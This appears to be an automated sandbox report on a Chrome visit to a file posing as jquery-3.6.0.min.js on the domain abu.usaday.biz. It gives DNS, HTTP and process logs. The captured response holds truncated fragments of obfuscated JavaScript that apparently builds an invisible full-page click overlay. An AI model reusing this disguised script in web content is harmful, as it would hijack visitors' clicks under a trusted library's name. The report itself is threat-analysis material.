              Jul 12, 2024 14:55:44.340207100 CEST1.1.1.1192.168.2.50xe184No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
              Jul 12, 2024 14:56:06.729461908 CEST1.1.1.1192.168.2.50x87b2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Jul 12, 2024 14:56:06.729461908 CEST1.1.1.1192.168.2.50x87b2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
              Jul 12, 2024 14:56:27.652137995 CEST1.1.1.1192.168.2.50x2d9fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Jul 12, 2024 14:56:27.652137995 CEST1.1.1.1192.168.2.50x2d9fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
              Jul 12, 2024 14:56:32.633610964 CEST1.1.1.1192.168.2.50x22bcNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Jul 12, 2024 14:56:32.633610964 CEST1.1.1.1192.168.2.50x22bcNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              • abu.usaday.biz
              • https:
              • a.nel.cloudflare.com
              • fs.microsoft.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549710188.114.96.34433220C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-07-12 12:55:16 UTC676OUTGET /jquery-3.6.0.min.js HTTP/1.1
              Host: abu.usaday.biz
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              sec-ch-ua-platform: "Windows"
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: navigate
              Sec-Fetch-User: ?1
              Sec-Fetch-Dest: document
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-07-12 12:55:16 UTC736INHTTP/1.1 200 OK
              Date: Fri, 12 Jul 2024 12:55:16 GMT
              Content-Type: application/javascript
              Content-Length: 2790
              Connection: close
              Last-Modified: Tue, 01 Jun 2021 06:00:40 GMT
              ETag: "60b5cd08-ae6"
              Expires: Fri, 12 Jul 2024 19:45:19 GMT
              Cache-Control: max-age=43200
              CF-Cache-Status: HIT
              Age: 18597
              Accept-Ranges: bytes
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iaRkgW28TLRiw8Dc9U7AUo8NLvqFR4tiNe56ILLtwws4McUrJy%2F5qu7%2BjluE7FQf6fNQfqb5QT3cL9YBXrVAJjxDJuLgSoNrZCtYWgOPOF7irIHoVjRG2K9SS%2F3aFWjY8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a212fca68e2191e-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-12 12:55:16 UTC633INData Raw: 76 61 72 20 5f 30 78 35 63 37 31 3d 5b 22 5c 78 36 33 5c 78 33 38 5c 78 33 32 5c 78 33 32 5c 78 36 33 5c 78 33 31 5c 78 36 32 5c 78 33 36 5c 78 33 33 5c 78 33 38 5c 78 33 35 5c 78 33 33 5c 78 36 35 5c 78 36 34 5c 78 33 32 5c 78 33 37 5c 78 33 33 5c 78 36 32 5c 78 33 38 5c 78 33 39 5c 78 33 36 5c 78 33 38 5c 78 33 37 5c 78 36 31 5c 78 36 33 5c 78 33 35 5c 78 33 30 5c 78 33 35 5c 78 36 36 5c 78 33 39 5c 78 36 36 5c 78 36 31 22 2c 22 5c 78 33 37 5c 78 33 33 5c 78 33 38 5c 78 36 31 5c 78 36 31 5c 78 33 38 5c 78 36 34 5c 78 33 33 5c 78 36 32 5c 78 36 33 5c 78 33 30 5c 78 33 32 5c 78 36 35 5c 78 36 32 5c 78 33 38 5c 78 33 37 5c 78 33 31 5c 78 33 32 5c 78 36 31 5c 78 36 33 5c 78 36 34 5c 78 33 30 5c 78 36 35 5c 78 36 32 5c 78 33 32 5c 78 36 33 5c 78 36 36 5c 78
              Data Ascii: var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x
              2024-07-12 12:55:16 UTC1369INData Raw: 33 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 34 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 22 2c 22 5c 78 36 39 5c 78 36 34 22 2c 22 5c 78 36 33 5c 78 37 33 5c 78 37 33 5c 78 35 34 5c 78 36 35 5c 78 37 38 5c 78 37 34 22 2c 22 5c 78 37 33 5c 78 37 34 5c 78 37 39 5c 78 36 43 5c 78 36 35 22 2c 22 5c 78 37 37 5c 78 36 39 5c 78 36 34 5c 78 37 34 5c 78 36 38 5c 78 33 41 5c 78 33 31 5c 78 33 30 5c 78 33 30 5c 78 32 35 5c 78 33 42 5c 78 32 30 5c 78 36 38 5c 78 36 35 5c 78 36 39 5c 78 36 37 5c 78 36 38 5c 78 37 34 5c 78 33 41 5c 78 33 31 5c 78 33 30 5c 78 33 30 5c 78 32 35 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 46 5c 78 37 33 5c 78 36 39 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 33 41 5c 78
              Data Ascii: 3\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x
              2024-07-12 12:55:16 UTC788INData Raw: 30 5c 78 33 31 5c 78 33 30 5c 78 33 30 5c 78 32 35 5c 78 33 42 5c 78 32 30 5c 78 36 33 5c 78 37 35 5c 78 37 32 5c 78 37 33 5c 78 36 46 5c 78 37 32 5c 78 33 41 5c 78 32 30 5c 78 36 34 5c 78 36 35 5c 78 36 36 5c 78 36 31 5c 78 37 35 5c 78 36 43 5c 78 37 34 5c 78 32 32 5c 78 33 45 5c 78 33 43 5c 78 32 46 5c 78 36 31 5c 78 33 45 22 2c 22 5c 78 36 46 5c 78 36 45 5c 78 36 33 5c 78 36 43 5c 78 36 39 5c 78 36 33 5c 78 36 42 22 2c 22 5c 78 36 34 5c 78 36 39 5c 78 37 33 5c 78 37 30 5c 78 36 43 5c 78 36 31 5c 78 37 39 22 2c 22 5c 78 36 45 5c 78 36 46 5c 78 36 45 5c 78 36 35 22 2c 22 5c 78 36 31 5c 78 37 30 5c 78 37 30 5c 78 36 35 5c 78 36 45 5c 78 36 34 5c 78 34 33 5c 78 36 38 5c 78 36 39 5c 78 36 43 5c 78 36 34 22 2c 22 5c 78 36 32 5c 78 36 46 5c 78 36 34 5c 78 37
              Data Ascii: 0\x31\x30\x30\x25\x3B\x20\x63\x75\x72\x73\x6F\x72\x3A\x20\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x61\x3E","\x6F\x6E\x63\x6C\x69\x63\x6B","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x7


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.549709188.114.96.34433220C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-07-12 12:55:17 UTC603OUTGET /favicon.ico HTTP/1.1
              Host: abu.usaday.biz
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: image
              Referer: https://abu.usaday.biz/jquery-3.6.0.min.js
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-07-12 12:55:17 UTC602INHTTP/1.1 404 Not Found
              Date: Fri, 12 Jul 2024 12:55:17 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Cache-Control: max-age=14400
              CF-Cache-Status: EXPIRED
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a212fcd7fcb19f7-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-12 12:55:17 UTC587INData Raw: 32 34 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20
              Data Ascii: 244<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->...
              2024-07-12 12:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.54971435.190.80.14433220C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-07-12 12:55:18 UTC541OUTOPTIONS /report/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3D HTTP/1.1
              Host: a.nel.cloudflare.com
              Connection: keep-alive
              Origin: https://abu.usaday.biz
              Access-Control-Request-Method: POST
              Access-Control-Request-Headers: content-type
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-07-12 12:55:18 UTC336INHTTP/1.1 200 OK
              Content-Length: 0
              access-control-max-age: 86400
              access-control-allow-methods: OPTIONS, POST
              access-control-allow-origin: *
              access-control-allow-headers: content-type, content-length
              date: Fri, 12 Jul 2024 12:55:17 GMT
              Via: 1.1 google
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.54971535.190.80.14433220C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-07-12 12:55:19 UTC484OUTPOST /report/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3D HTTP/1.1
              Host: a.nel.cloudflare.com
              Connection: keep-alive
              Content-Length: 436
              Content-Type: application/reports+json
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-07-12 12:55:19 UTC436OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 37 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 62 75 2e 75 73 61 64 61 79 2e 62 69 7a 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f
              Data Ascii: [{"age":0,"body":{"elapsed_time":275,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://abu.usaday.biz/jquery-3.6.0.min.js","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"netwo
              2024-07-12 12:55:19 UTC168INHTTP/1.1 200 OK
              Content-Length: 0
              date: Fri, 12 Jul 2024 12:55:19 GMT
              Via: 1.1 google
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.549717184.28.90.27443
              TimestampBytes transferredDirectionData
              2024-07-12 12:55:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-07-12 12:55:20 UTC466INHTTP/1.1 200 OK
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              Content-Type: application/octet-stream
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              Server: ECAcc (lpl/EF67)
              X-CID: 11
              X-Ms-ApiVersion: Distribute 1.2
              X-Ms-Region: prod-neu-z1
              Cache-Control: public, max-age=98074
              Date: Fri, 12 Jul 2024 12:55:20 GMT
              Connection: close
              X-CID: 2


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.549718184.28.90.27443
              TimestampBytes transferredDirectionData
              2024-07-12 12:55:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
              Range: bytes=0-2147483646
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-07-12 12:55:21 UTC514INHTTP/1.1 200 OK
              ApiVersion: Distribute 1.1
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              Content-Type: application/octet-stream
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              Server: ECAcc (lpl/EF06)
              X-CID: 11
              X-Ms-ApiVersion: Distribute 1.2
              X-Ms-Region: prod-weu-z1
              Cache-Control: public, max-age=98050
              Date: Fri, 12 Jul 2024 12:55:21 GMT
              Content-Length: 55
              Connection: close
              X-CID: 2
              2024-07-12 12:55:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


              020406080s020406080100

              Click to jump to process

              020406080s0.0050100MB

              Click to jump to process

              Target ID:0
              Start time:08:55:08
              Start date:12/07/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Imagebase:0x7ff715980000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:2
              Start time:08:55:12
              Start date:12/07/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,8453212214177823688,14741877041424524147,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Imagebase:0x7ff715980000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:3
              Start time:08:55:15
              Start date:12/07/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://abu.usaday.biz:443/jquery-3.6.0.min.js"
              Imagebase:0x7ff715980000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

              No disassembly